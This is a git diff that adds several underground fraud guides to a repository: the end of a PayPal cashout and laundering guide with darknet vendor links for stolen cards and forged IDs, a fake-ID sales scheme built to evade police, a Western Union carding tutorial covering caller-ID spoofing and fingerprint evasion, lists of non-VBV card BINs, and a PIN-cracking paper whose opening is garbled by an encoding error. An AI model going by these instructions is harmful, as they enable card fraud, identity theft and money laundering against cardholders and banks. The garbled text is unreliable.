etc. Doesn’t happen often but it’s part of the +game, will just have to cut your looses. + +33)Your MM account can’t handle USA CC funds – Some country +accounts can’t receive direct from CC USA funds, if you keep hitting a +roadblock with a certain account/Middle man double check to see +which country it is from. +34)You forgot to load proxifier with vip72 and the ip is the ip of the vpn +instead of matching the card holders city. +I believe that covers everything for making payments with credit cards, +again if any issues/questions PM me and I’ll help you out! +SECTION 3: Paypal Transfer +Tunnel +Overview: This is just a quick section on how the transfers should flow from +credit card to middle man’s to cash out and why +The flow should look like this: +Credit card/paypal credit > gateway > middle man 1 > gateway/ecommerce +store > Middle man 2 > Cash out Payapal account. +Doing it this way you are cutting off the charge backs long before your cash +out account which you want to protect at all cost especially if you’ve +invested in an expensive bank drop or spent a lot of time building +transaction history etc. +The first middle man is basically used as foot soldiers to receive the dirty +funds, you know eventually they will be killed off. + +The second middle man is your captain, to receive the funds from the +soldiers and lastly the third paypal account is your king, which will be +protected from chargebacks from the first two. +This doesn’t mean that the cash out account is 100% safe, paypal might +eventually figure out what’s going on and close down the account. +SECTION 4: Middle Man +account’s, aging, transaction +history & transfer limits +Overview: In this section I will be covering how to build from scratch middle +man and cash out accounts, how to age the accounts and add transaction +history, limits of transfers for each account and how to over come paypal +errors. +I always build my own middle man and cash outs from scratch as I have +complete control over these and I know it was done properly. +When you see people on the forums having lots of problems it’s usually +from crappy made middle man accounts or hacked ones like on slilpp… +Having the same IP, keeping the same cookies and computer type etc is +crucial for paypal and avoiding errors. +Step 1: Making the paypal account: + +Alright so let's get started, the first thing we're going to need is the RDP/VPS +In layman's terms a VPS/RDP is basically another computer that hosted +somewhere else. You’re going to use these as the personal computer to +open the paypal accounts. +Paypal is ultra sensitive about IP address/cookies. With a VPS/RDP you are +able to create a paypal account and login with the same IP and cookies +which will save you from alot of the dreaded paypal erors. +You could also make a new virtual machine on your computer and buy a +dedicated socks5 etc but I find using rdp/vps alot easier. +Were to buy: EVO is filled with sellers you can buy from hacked and none +hacked. You can also Google search usa vps/rdp and there's plenty of +companies selling them. Buy from one that has bitcoin payment as option +Hacked VS not hacked: Hacked rdp's/vps is a computer that’s been +infiltrated by one of the vendors, the owner still has access to it and can see +what you’re doing. +These are ok to use in this instance as we won't be using these for long but +if you’re going to make a cashout/middle man account I would for certain +get a none hacked one that you have complete control over and will last +long( I typically use none hacked regardless). +Now that you have the vps/rdp you can login on to it, this will be different +depending what OS you’re using, but it’s very straight forward and the +vendor will give you all the information you need. +ALWAYS!! Connect to the rdp/vps through a security barrier; never connect +using your own isp!! + +Once your logged on you’ll notice that the computer is bare so you’ll need +to install firefox and flash. +Step one is done let's move on to creating the account... +First you'll need to make a generic e-mail(like gmail). I would use the full +name of the fullz to make it ex: jonsmith55@gmail.com +Next you will need either a credit profile fullz or a cc fullz. +Why use fulls and not just random info? Because when your account comes +under review/suspension it’s much easier to re-activate it with real info. +Next go to paypal.com and register with the fulls info. For cashout account +you can use either of the 3 paypal account types but I typically stick to +business account’s for the rest of the MM’s, while they might require more +documents they are easy to obtain and business accounts are better for +receiving dirty funds. +Step 2: Verifying – Bank accounts +For verifying the account I will use different methods depending on what +the middle man accounts will be used for. +For middle man 0(paypal credit account) and middle man 1 I like to use the +method described in section one with large bank account credit card. +The reason is I know these will be burned quite quick and I just want to get +the most funds out of these before the chargebacks happen. +For middle man 2 I use a combination of vba(virtual bank account) and +vcc(virtual credit card) to verify. I also use this for cashout or use a bank +account drop that I acquired for the cash out account. +To verify the account with a VBA or VCC you can purchase them from EVO +or places like openvcc.com… This is very simple, after you bought the + +accounts go into your paypal account and click add bank account and follow +instructions. +Step 3: Phone verification +As far as I know none of the VOIP system works for SMS verification from +paypal, you’ll need to use a sim card number. With that said I often have the +SIM number for verification on file and a VOIP number on file that I use for +calling when I get limited etc… +For the SMS verification we have many options: +If you live in the same country as the pp account it’s as simple as buying a +burner phone and a new prepaid sim card for every account. +If you don’t it get’s a bit more complication but there’s some solutions: +35)Buy USA sim cards that work worldwide. FNUFNU sells these on EVO +and works great +36)Buy above SIM cards from ebay and send to drop +37)Several vendors on EVO offer paypal sms verification services. +I would always opt for having your own simcards instead of relying on +services in case you are prompted for sms verification before checkout. +STEP 4: Aging & Transaction history: +The more transaction history and age your paypal account has the more it +can handle in receiving funds! +Ideally aging the accounts for a month or more would be best but if you’re +on a time constraint 1 week would be ok. +As far as transaction history it would be best to run $500-$2000 of clean +funds through the account spread across a month. Of course this is not +necessary but it does make a big difference. + +You will want to make gradually bigger transfers with the clean funds. +For example you could do 5 days of $50, 5-7 days of $100, etc and build up +depending on your clean fund budget for the middle man account. +How do add clean funds to the account: +This is quite easy to do actually and you can use a combination of these: +38)Go to forums like bitcointalk.org OR seller platforms for alt coins and +sell bitcoin for paypal. Now I know this is risky but only trade with +clearly reputable members, do your research. Also when they send +ask them to put in the buying notes “I have received the goods +already and will under no circumstance chargeback this transaction” +While this can be risky I’ve run into minimal problems and I like this +method as the accounts receive transfers from a bunch of different +verified paypal accounts which looks good under paypals eyes. +39)Open an instant account like entropay.com, fund it with WU or +moneygram bank transfer, use the vcc to send funds to the paypal +account +40)Buy prepaid mastercards/visa giftcard found in local shops +41)Use methods above to load money on clean paypal and use that +clean paypal to spread funds to all your middle man accounts. This +can be a bit more risky as it links all your accounts together. +STEP 5: Sending/receiving limits +While paypal isn’t an exact science here are some guideless for receiving +and sending money: +If your account is fairly new and no transaction history I would like the +transfers under $150-$200 +If you have a month aged + around $500 transaction history you can receive +$300-$400 transfers no problem + +With a month aged account and $1000-$2000 in transaction history you will +be able to receive $1000 up transfers no problem +When receiving the funds always wait atleast 24 hours before +sending/withdrawing out of account. +When you withdraw don’t take it all out, I usually do half and then do the +rest the next day. +STEP 6: What to do when your account gets limited: +I’m not sure why people are so concerned with getting there paypal account +limited…It’s not a big deal and will most likely happen eventually, but the +good thing is once you sort this the account comes back stronger than ever +and is able to receive even bigger transfers. +To get un-limited you will need to send in a copy of scans. Make sure the ID +has all the same info as the fulls you used to make the account. +There’s plenty of vendors that make HQ scans on EVO, please see the +resources section. +TIP: Make sure to get high quality scans, paypal will know its fraud if using +lower quality scans. Also if you’re a good graphic artist I would recommend +buying templates and doing these yourself as you will save a lot of money in +the long run. +For my cash out accounts I sometimes even get a real plastic ID made. The +cost isn’t very different then HQ scans(but you’ll need to sort a drop) and +you can write on a piece of paper paypal verification and put the ID beside +it and take a picture(make sure to take care of meta data). +STEP 7: Buying pre made accounts: +I recommend always making your own accounts but if you want to buy +some you can buy them from buyvcc.com + +Also looks like Yasuo from EVO will be selling some with transaction history +built in @ really reasonable prices so that’s something to consider when +there ready. +Section 5: Cashing out +Now we get to the fun stuff, being rewarded for all our effort. In my opinion +cashing out is the easy part, building and maintaining the transfers and +middle man accounts is what requires the most work! +There’s literally 100’s of ways to cash out a paypal account but in this guide I +will be focusing on 3 methods I use almost daily. +Method 1: Cashing out via freelancing sites +Overview: +You might have heard of some variation of these but this system the way I +lay it out is one of the most effective cash outs. +What were going to do is make a profile on several sites like elance.com , +odesk.com , freelancer.com peopleperhour.com etc. +Now the great thing about the above websites is that they accept paypal +and can pay out via paypal OR wire transfer to any bank. +This is great for us since paypal has a lot of restrictions on which bank we +can use etc but the freelancer sites accept pretty much any bank and we +can spread out the payments across 3-4 platforms with the same bank +account! +That means we can even use a high limit polish bank account that are very +cheap to cash out with. + +You can even use pre paid cards like payoneer card which is very easy to +acquire with drops and scan but is more limited on funds received. +Step By Step: +42)Get a bank drop(see resources section) Some vendors will even send +you tracks which means you don’t need a drop(but you will need to +invest into a card writer) +43)Use the same personal info from bank drop to create a profile on +elance.com, odesk.com , freelancer.com +44)Attach the bank account to the freelancer sites +45)Fill the account with a realistic profile and portfolio(can look up +others for ideas) +46)Create buyer accounts on the same freelancer sites on the second +tier middle man accounts +47)Post jobs under the buyer accounts +48)Apply for said job with worker account +49)Accept the work +50)Payout to the working account +So to recap we need to build the sales funnel described in section 3, so the +transfer process should look like this: +Creditcard/paypal credit > gateway > middle man 1 > gateway/ecommerce +site > middle man 2 > odesk/elance/freelancer > bank drop. +Now the sites do hold the money for 6 days before sending out the transfer +to your bank drop but that shouldn’t’t be a problem as the funds are almost +clean by middle man 2 anyways if you followed the above layout. + +With a proper funnel you should be able to cash out 5-10K a week no +problem with this method. +Method 2: Alt Coins +I know some of you are going to roll your eyes at this but it’s probably the +most effective way of cashing out a paypal account with minimal +investment… +While bitcoin is super popular and people have already caught on to fraud +there’s plenty of other online coins that people are still trading with paypal +as a platform. Most of these people are hobbyist, wannabe traders etc that +aren’t aware of the “dark side” of these coins. +Certain websites sell $250-$500 per day of alt coins with paypal and only +require simple scans! +Just to put some perspective on it once I get this method rolling I can easily +cash out $500-1K per day from a single account.. +I don’t want to list specific websites on this guide as I’m sure they will be +burnt if were all using the same ones but I have 50+ of these I can use so +send me a PM and I’ll send everyone different links +With that said a simple google search such as “doge coin trading” or “buy +xyz coin” will bring you back results, sift through them. +A lot of the coins have there equivalent of localbitcoins but still use paypal. +When you sign up on these it will be slow at first as you gain trust but after +a while you can start having some nice daily cash outs. +Then its just a simple matter of trading the coins for bitcoins. +Again you want the cashout account to last as long as possible as you can +build trust that way and lead to bigger cash outs so you should still follow +the paypal transfer funnel + +Credit card/paypal credit > gateway > middle man 1 > gateway/ecommerce +platform > middle man 2 > cashout account > alt coin +Method 3: Buying physical items to drop +If you have access to drops this is quick and easy way to cash out. +TIP: If you can I would buy ucard’s drop guide if you’re interested in this +method. +You can make an ebay account with the paypal and buy physical items and +ship to drop. There’s a ton of easy things that you can re-sell for near same +value locally such as gold bars, coins, rare currency, rare stamps etc. +The good thing about this is that you can keep re-using the same drop for a +while. +If you don’t live in the US you can use the many fence/re-ship options on +EVO although this will cut into your profit margin heavily. +TIP: If you live outside the US you can make a cash out account in the +same country that you live in and buy items online locally from various +websites that accept paypal. +SECTION 6: RESOURCES +Bank drops: +http://www.payoneer.com – prepaid card +Vending solutions http://k5zq47j6wd3wdvjq.onion/store/10831 + +There’s also a bunch of vendors poping up that you can use there drops for +commission. While I havn’t used them myself yet some look reliable. +Credit cards/fullz: +Railguycc – great quality cards, I think I bought nearly $15 000 in cards from +him and always very reliable +http://k5zq47j6wd3wdvjq.onion/store/826 +Platinum, fullz and CC: http://k5zq47j6wd3wdvjq.onion/store/55936 +Kalashnikov: He has a bunch of resellers now but if you contact him directly +for bulk you can get some super good pricing +http://k5zq47j6wd3wdvjq.onion/profile/4165 +SIM CARDS: +FNUFNU: http://k5zq47j6wd3wdvjq.onion/listing/186 +VBA/VCC: +Openvcc.com +Security: +Mullvad: mullvad.net +VIP72: vip72.asia +Ccleaner: piriform.com + +Well that just about covers everything. Good luck and if you have any +questions send me a PM! +MISTERBITCOIN diff --git a/Mr. Slaves Guide to the Unique Pin Business Cards Marketing Approach To Selling Ids_pdf.md b/Mr. Slaves Guide to the Unique Pin Business Cards Marketing Approach To Selling Ids_pdf.md new file mode 100644 index 0000000..55f96ff --- /dev/null +++ b/Mr. Slaves Guide to the Unique Pin Business Cards Marketing Approach To Selling Ids_pdf.md @@ -0,0 +1,74 @@ +# Mr. Slaves Guide to the Unique Pin Business Cards Marketing Approach To Selling Ids + + +--- + +Mr. Slaves Guide to the Unique Pin Business Cards Marketing +Approach To Selling Ids +Ok basically this guide is a spinoff the idea in The Ultimate Fake ID Guide V5 about using +secure unique pins so I first and foremost do not take credit for idea this is just my spinoff on a +way to apply the idea. Well now that we have that covered on to the idea behind this the +reason why we would use this. +1. To keep the manufacturer, marketer and collector non affiliated. +2. So referring party is safe and still receives commission on sales. (not collecting info or +money. +3. Make life for collector of payments easier and hassle free and hands off . +Alright so here’s how this works how I do it is I use this site to generate random strings +http://www.random.org/strings/ (the link from above for u freaks that think I would link u +to malicious site lol) wtf I’m mr. slave not hackerx lol +The setting I use as are follows u can tweak for your needs I generate 100 strings at a time +With each string being 16 characters long and then I chose “lower case letters” and +“numeric digits” checkboxes (upper and lower case is just down right confusing) +Then make sure u check this option “Each string should be unique (like raffle tickets drawn from +a hat)” otherwise u will have duplicates I your output and defeats the whole purpose of doing this. +The press get strings then u will see a long list of random generated strings now copy the whole list +and paste into a notepad or preferably a WordPad or Microsoft word file is best cause text is +searchable later when I explain the need you will understand fully. +Ok so u should have a nice unique list of random strings what u will do with these is save them to a +named file for each different list. +Ok so now what do we need this damn list for lol. +These are going to be are unique pins to put on back of business cards etc for one time use to get +info and purchase id. Basically your middle man at college etc will show a demo id and then give +them biz card and person can contact for more info the email addy I used a pseudonym for my +secure anonymous email address so I know when I get an email to it what its for. + +Ok for what Mr. Slave suggests is tell them on back of biz card to use that code as “subject” field in +email so for instance your writing an email u see a “To” field a “cc” field and “bcc” field and then u +see “Subject” +This string should be put in the subject line for future and easy reference if no pin is put in then no +answer etc or if it doesn’t show up in your searchable list no answer so if customer gets busted +with his new novelty he shows then biz card and he cant find u(the guy who gave it to him hopefully +u showed this guy it at a random party and he doesn’t remember your ugly mug) the cops try to +email ur addy with a email and then u instantly know u already finished order on that pin so u know +it’s a setup. Etc +Alright now for how to pay your wonderful men on the ground each time u receive and fill an order +u can delete off your list the pin after u check to see what guys list the pin was on and he gets the +kudos for the successful buy and percentage. +This helps in so many way ur men on the ground never need to make further contact this is like a +onetime street sale not for repeat buyers and since your man on ground doesn’t collect funds +He really can’t be implicated in the sale as much at time of writing I could find nothing to put the +man in legal hurdles but correct me if im wrong. +Closing notes +Mr. Slave says Microsoft word is the best for saving document cause word has a handy function +for searching the document to find if pin is valid or perused the exact name of it is called “find” for u +Microsoft illiterate out there and is located under the “home tab” far upper right corner(In office +2007 in my case your version could be different just look for “find” function) +Also keep one pin per line should look like this example + jgn47j5zqyrxvgxj + nn5f1w84h20iv49l + xwm9rhjp79smvimm + sr5uouftbvozk9cw + 8r3q8t1o3ljyflhf + j3c6di4zx1r7cot5 + 904bd1ydj06us2q5 + bw306eqahu0hrb21 + 8mnxwik1ddajjxug + +Copy this : 8r3q8t1o3ljyflhf +and test the” find” feature and you will see how well it works +Also after u receive email from potential buyer after u do ur checks then give them links to ur demo +pics online and your app im working on an dl app .pdf form along with detailed ways to pay by web +money for customer like guide suggested and wu but as whoever it was in the V5 guide bests to use +web money . +Well thanks for reading my spinoff Mr.Slave guide and yes for those of u wondering out there I am +Bisexual u weird freaks lol diff --git a/NEW2017WESTERNUNIONSCAMTUTORIAL_txt.md b/NEW2017WESTERNUNIONSCAMTUTORIAL_txt.md new file mode 100644 index 0000000..7a1675e --- /dev/null +++ b/NEW2017WESTERNUNIONSCAMTUTORIAL_txt.md @@ -0,0 +1,200 @@ +# NEW2017WESTERNUNIONSCAMTUTORIAL + + +--- + +Joined: Mon Jun 06, 2016 2:48 pm +Post Thu Jun 16, 2016 1:32 pm +NEW WESTERN UNION [TUTORIAL] TESTED +Items you need, + +1,local socks 5 +get them at www.vip72.org + +2.get cookie cleaner +www.ccleaner.com + +3.flash cookie cleaner +www.flashcookiecleaner.com + +4.get evercookie cleaner +bleachbit.sourceforge.net/download/windows + +4a .mac address changer +technitium.com/tmac + +5.free user agent changer +google it + +6. get free Disable WebRTC because it leaks your info + +https://addons.mozilla.org/en-US/fir...rc=userprofile + +6.b get free Disable Plugin & Mimetype Enumeration + +https://addons.mozilla.org/en-US/fir...rc=userprofile + +6.C get free management of the user interface language + +https://addons.mozilla.org/en-US/fir...rc=userprofile + +7. Get e mail in card holders name +www.mail.com fast easy no phone needed + +8.good debit card non vbv bins + +403497 US VISA DEBIT BUSINESS PNC BANK, N.A. +432630 US VISA DEBIT PLATINUM BANK OF AMERICA, N.A. +441103 US VISA DEBIT PREMIER JPMORGAN CHASE BANK, N.A. +441282 US VISA DEBIT PLATINUM COMMERCE BANCSHARES, INC. +463572 US VISA DEBIT BUSINESS BANK OF AMERICA, N.A. +463575 US VISA DEBIT BUSINESS BANK OF AMERICA, N.A. +463576 US VISA DEBIT BUSINESS BANK OF AMERICA, N.A. +474398 US VISA DEBIT BUSINESS RBC BANK (USA) +478821 US VISA DEBIT BUSINESS FIRSTBANK +482880 US VISA DEBIT BUSINESS WACHOVIA BANK, N.A. +491991 US VISA DEBIT BUSINESS WELLS FARGO BANK, N.A. +544928 US MASTERCARD DEBIT GOLD KEYBANK, N.A. + +426614 TW VISA DEBIT INFINITE CHINATRUST COMMERCIAL BANK +427856 RU VISA DEBIT INFINITE OJSC BANK PETROCOMMERCE +432159 SA VISA DEBIT INFINITE AL RAJHI BANKING AND INVESTMENT CORP. +497195 FR VISA DEBIT INFINITE CAISSE NATIONALE DES CAISSES D'EPARGNE (CNCE) +497522 FR VISA DEBIT BUSINESS NATIXIS +497926 FR VISA DEBIT GOLD PREMIUM BNP PARIBAS +497927 FR VISA DEBIT GOLD PREMIUM BNP PARIBAS +497928 FR VISA DEBIT GOLD PREMIUM BNP PARIBAS +497929 FR VISA DEBIT GOLD PREMIUM BNP PARIBAS +426684 US VISA CREDIT PREMIER CHASE BANK USA, N.A + +9.call spoofer +www.crazycall.net +or any other app on ITUNES or GOOGLE PLAY + +Ok so lets start the attack on Western Union,xoom,money gram ,ria money + +What You Need are brains ,wit and some basic skills ,, + +step 1 + +change your computer name to card holders name ,, you must restart your + +computer to make the change active + +Step 1a + +Clean you PC. +Download CC Cleaner , flash cookie cleaner and bleach bit cleaner make sure you wipe all +the cache and cookies from your machine inc FLASH cookies with the flash cookie cleaner + +Wipe Free space +Make sure you do 35x Pass + +Step 2a + +Download User Agent switcher +fire fox plugin + +https://addons.mozilla.org/en-US/fir...rc=userprofile + +Step 3a + +Open CMD and type +Ipconfig /release +Ipconfig /renew +Ipconfig /flushdns + +To clear you ip and DNS cache + +step 4a + +Open your browser and in Tools you should now see a tab called Default User Agent + +Open the tap and select any user agent you like + +4b ,enable WebRTC ,use plugin + +4C.enable Plugin & Mimetype Enumeration + +4D disable flash plugin or it will leak your true ip + +4f.enable management of the user interface language download the cardholders languge + +and use card holders language + +Step 5a + +Find a CLEAN and LOCAL Socks5 Not HTTP, Not Socks4 MUST BE 5 +and MUST be clean. Make sure and check if the Socks is blacklisted +and make sure its a local sock 5.. try and get the sock as near as possible +to the cardholders actual area zip code + +5b .go to www.whoer.net to check if your leaking any info + +step 6a + +check to see if ip is black listed + +step 7 + +change mac address to a local address of the cardholder + +Step 8 reclean your computer again wiht bleach bit + +Now the actual hit on Western union + +step 1 + +make a new email with the local socks on + +www.mail.com using the card holders name and make a fresh legit e mail for + +yourself or your drop too + +step 2 + +sign up to WESTERN UNION,MONEY GRAM,XOOM,RIA MONEY ETC + +step 3 + +sign up fill in needed info confirm you account + +step 4 + +Fill out all the info you need for the transfer wait for + +the confirmation or the web page saying there doing more checks + +step 5 + +if you get WE ARE DOING SOME CHECKS PAGE + +And if you have fullz info just go ahead and call then using fullz info and using + +the call spoof app with the card holders number if your not from the USA us call + +forwarding to call spoofer + +and ask them what seems to be the problem . + +Use the voice spoof to your advantage if you a young guy or gal and the card holder + +is 60 yrs use the voice spoofer to lower your voice . + +If you have fullz but a vbv card try steps 1a to 9a + +and hope there is not the vbv code on . + +or better yet if you have fullz call the WESTERN UNION CALL CENTER + +or others using the spoof caller with card holders number + +and tell them you dont like to give your credit card and personal info + +via internet,, and do the hit via the phone + +PLEASE NOTE THAT WESTERN UNION OR OTHER INSTANT MONEY SENDERS + +PREFER DEBIT CARD OVER CREDIT CARDS + +AND THESE METHODS ARE A HIT AND MISS TACKTIK SO KEEP IT UP diff --git a/NON VBV 2017_txt.md b/NON VBV 2017_txt.md new file mode 100644 index 0000000..fd7751e --- /dev/null +++ b/NON VBV 2017_txt.md @@ -0,0 +1,78 @@ +# NON VBV 2017 + + +--- + +NON VBV (2016) +497538 Natexis Banques Populaires CREDIT CLASSIC France Paris NEW no vbv +488893 Fia Card Services, N.A. CREDIT PLATINUM USA Wilmington Delaware DE NEW no vbv +402944 Td Banknorth, N.A. DEBIT CLASSIC USA Portland Maine ME NEW no vbv +458090 Bank Leumi Le-Israel B.M. CREDIT BUSINESS Israel Tel Aviv NEW +442742 JPMorgan Chase Bank N.A. - Debit DEBIT BUSINESS USA Columbus Ohio OH NEW no vbv +429672 Community America C.U. DEBIT CLASSIC USA Kansas City Missouri MO NEW no vbv +480327 Addison Avenue F.C.U. DEBIT CLASSIC USA Palo Alto California CA NEW maybe no vbv +421701; VISA;VALLEY BANK AND TRUST;DEBIT;CLASSIC;UNITED STATES;US;USA;840 +426387 Svenska Handelsbanken AB (Publ) DEBIT CLASSIC Sweden Stockholm NEW maybe no vbv +425908 ;VISA;ALBOBANCO S.A.;DEBIT;BUSINESS;UNITED STATES;US;USA;840 no vbv +408104 Desert Schools F.C.U. DEBIT CLASSIC USA Phoenix Arizona AZ NEW maybe no vbv +414709 Capital One Bank CREDIT SIGNATURE no vbv +435583 Applied Card Bank DEBIT CLASSIC USA Wilmington Delaware DE NEW no vbv +449105 Citizens National Bank of Albion DEBIT CLASSIC USA Albion Illinois IL NEW no vbv +415747 Wells Fargo Bank, N.A. DEBIT CLASSIC USA Sioux Falls South Dakota SD NEW need dob for vbv +++++++++++ +426428 Fia Card Services, N.A. CREDIT PLATINUM USA Wilmington Delaware DE NEW no vbv +549123 USAA SAVINGS BANK USA TEXAS SAN ANTONIO need dob for vbv +402944 Td Banknorth, N.A. DEBIT CLASSIC USA Portland Maine ME NEW no vbv +439707 Barclays Bank Delaware CREDIT SIGNATURE USA Wilmington Delaware DE NEW no vbv +80664 Bank of Benton DEBIT CLASSIC USA Benton Kentucky KY NEW no vbv +425489 Heritage South F.C.U. DEBIT CLASSIC USA Sylacauga Alabama AL NEW no vbv +432423 National Bank of Kuwait, S.A.K. CREDIT CLASSIC Kuwait Safat NEW no vbv +424631 Chase Bank USA, N.A. CREDIT BUSINESS USA Newark Delaware DE NEW no vbv +486236 Capital One Bank CREDIT PLATINUM USA Richmond Virginia VA NEW no vbv +446053 U.S. Bank N.A. DEBIT CLASSIC USA Cincinnati Ohio OH NEW no vbv +479030 SEB Vilniaus Bankas AB CREDIT CLASSIC Lithuania Vilnius NEW no vbv +479126 Esl F.C.U. DEBIT CLASSIC USA Rochester New York NY NEW no vbv +542432 FIFTH THIRD BANK, THE USA OHIO CINCINNATI no vbv +454337 Visa Iceland DEBIT CLASSIC Iceland Reykjavik NEW no vbv +451401 Royal Bank of Canada CREDIT CLASSIC Canada Montreal Quebec QC NEW dob for vbv +552672 BANK POLSKA KASA OPIEKI S.A. - (BANK PEKAO S.A.) EUR POL WARSZAWA no vbv +441281 Commerce Bancshares, Inc. DEBIT GOLD/PREM USA Kansas City Missouri MO NEW no vbv +468018 Zions First National Bank DEBIT CLASSIC USA Salt Lake City Utah UT NEW no vbv +419310 Capital One Bank CREDIT BUSINESS USA Richmond Virginia VA NEW no vbv +453825 The Bank of Nova Scotia CREDIT CLASSIC Canada OLD no vbv +428434 VISA;CITIZENS BANK OF CANADA;DEBIT;PREPAID;CANADA;CA;CAN;124;; no vbv +545534 CAPITAL ONE, NATIONAL ASSOCIATION USA LOUISIANA NEW ORLEANS no vbv +482854 Wachovia Bank, N.A. DEBIT CLASSIC USA Charlotte North Carolina NC NEW no vbv +447091 GE Money Bank DEBIT CLASSIC USA Salt Lake City Utah UT NEW no vbv +433438 First National Bank DEBIT CLASSIC USA Christiansburg Virginia VA NEW no vbv +520416 BANCO NACIONAL DE MEXICO, S.A. LA MEX DISTRITO FEDERAL MEXICO no vbv + +455015 National Bank of Kuwait, S.A.K. CREDIT CLASSIC Kuwait Safat NEW no vbv +403444 Capital One Bank CREDIT PLATINUM USA Richmond Virginia VA NEW +438567 Wells Fargo Bank, N.A. DEBIT CLASSIC USA Sioux Falls South Dakota SD NEW no vbv +554302 MASTERCARD;PT. BANK PERMATA;CREDIT;PLATINUM;INDONESIA;ID;IDN;360;; no vbv +546616 CITIBANK SOUTH DAKOTA, N.A. USA NEW YORK NEW YORK no vbv +402360 Poste Italiane S.P.A. (Banco Posta) DEBIT ELECTRON Italy Roma NEW no vbv +540168 CHASE BANK USA, N.A. USA DELAWARE WILMINGTON no vbv +479030 SEB Vilniaus Bankas AB CREDIT CLASSIC Lithuania Vilnius NEW no vbv ??? +498453 Banco do Brasil S.A. CREDIT CLASSIC Brazil Brasilia Distrito Federal DF NEW no vbv +462161 VISA;AMARILLO NATIONAL BANK;DEBIT;CLASSIC;UNITED STATES;US;USA;840;; no vbv +524886 MASTERCARD;ING BANK, N.V.;CREDIT;PLATINUM;NETHERLANDS;NL;NLD;528 no vbv ??? +546626 CHASE BANK USA, N.A. USA DELAWARE NEWARK CREDIT;WORLD CARD no vbv +528725 CITADEL FEDERAL CREDIT UNION USA PENNSYLVANIA THORNDALE no vbv ??? +457949 VISA;TELLER, A.S.;DEBIT;CLASSIC;NORWAY;NO;NOR;578 no vbv ??? +420767 JPMorgan Chase Bank N.A. - Debit DEBIT CLASSIC USA Columbus Ohio OH NEW no vbv +456323 JPMorgan Chase Bank N.A. - Debit DEBIT GOLD/PREM USA Columbus Ohio OH NEW no vbv +435237 Target National Bank CREDIT CLASSIC USA Sioux Falls South Dakota SD NEW no vbv +448275 Commerce Bank, N.A. DEBIT CLASSIC USA Cherry Hill New Jersey NJ NEW no vbv +520953 MASTERCARD;COOPERATIEVE CENTRALE RAIFFEISEN-BOEREN-LEENBANK BA;CREDIT;;NETHERLANDS;NL;NLD;528 no vbv ??? +458010 Bank Leumi Le-Israel B.M. CREDIT BUSINESS Israel Tel Aviv NEW no vbv +458003 Bank Leumi Le-Israel B.M. CREDIT CLASSIC Israel Tel Aviv NEW no vbv +547182 MASTERCARD;FIRST COMMONWEALTH BANK;DEBIT;STANDARD no vbv +497598 Natexis Banques Populaires CREDIT CLASSIC France Paris NEW no vbv ??? +497547 Natexis Banques Populaires CREDIT CLASSIC France Paris NEW no vbv ??? +513379 MASTERCARD;BANQUE FEDERATIVE DU CREDIT MUTUEL (BFCM);CREDIT;STANDARD;FRANCE no vbv ??? +513283 EUROPAY FRANCE SAS EUR FRA PARIS no vbv ??? +415056 Societe Generale CREDIT CLASSIC France Paris NEW no vbv ??? +472926 VISA;PEOPLES TRUST COMPANY;DEBIT;PREPAID;CANADA;CA no vbv +456268 Natexis Banques Populaires DEBIT ELECTRON France Paris NEW no vbv +456242 Natexis Banques Populaires DEBIT ELECTRON France Paris NEW no vbv +513263 EUROPAY FRANCE SAS EUR FRA PARIS no vbv diff --git a/PIN Cracking - Recovery Attacks_pdf.md b/PIN Cracking - Recovery Attacks_pdf.md new file mode 100644 index 0000000..7e80a99 --- /dev/null +++ b/PIN Cracking - Recovery Attacks_pdf.md @@ -0,0 +1,895 @@ +# PIN Cracking - Recovery Attacks + + +--- + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +-RO\RQ(cid:3)&OXORZ +3ULVP +MRO\RQF#SULVP(cid:17)FR(cid:17)]D +$EVWUDFW +7KH(cid:3)DXWKRU(cid:3)KDV(cid:3)GLVFRYHUHG(cid:3)VHYHUDO(cid:3)ZHDNQHVVHV(cid:3)LQ(cid:3)WKH(cid:3)IXQFWLRQV(cid:3)RI(cid:3)WKH(cid:3)VWDQGDUG(cid:3)ILQDQFLDO(cid:3)FU\SWR(cid:3) +WUDQVDFWLRQ(cid:3)VHW(cid:3)(cid:11)RU(cid:3)$3,(cid:12)(cid:17)(cid:3)(cid:3)7KHVH(cid:3)ZHDNQHVVHV(cid:3)OHDG(cid:3)WR(cid:3)D(cid:3)YDULHW\(cid:3)RI(cid:3)3,1(cid:3)UHFRYHU\(cid:3)DWWDFNV(cid:3)DSSOLFDEOH(cid:3)WR(cid:3) +KDUGZDUH(cid:3)VHFXULW\(cid:3)PRGXOHV(cid:3)(cid:11)+60(cid:12)(cid:3)RU(cid:3)FU\SWRFRSURFHVVRUV(cid:17)(cid:3)(cid:3)7KH(cid:3)DWWDFNV(cid:3)DUH(cid:3)H[WUHPHO\(cid:3)IDVW(cid:15)(cid:3)WDNLQJ(cid:3)RQO\(cid:3) +D(cid:3)FRXSOH(cid:3)RI(cid:3)VHFRQGV(cid:3) +.H\ZRUGV(cid:29) 3,1(cid:3)UHFRYHU\(cid:3)DWWDFNV(cid:15)(cid:3)WDPSHU(cid:3)UHVLVWDQW(cid:18)UHVSRQGLQJ(cid:3)VHFXULW\(cid:3)PRGXOHV(cid:15)(cid:3)$3,(cid:3)DWWDFNV +(cid:19) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +77DDEEOOHH(cid:3)(cid:3)RRII(cid:3)(cid:3)&&RRQQWWHHQQWWVV +(cid:20)(cid:17) 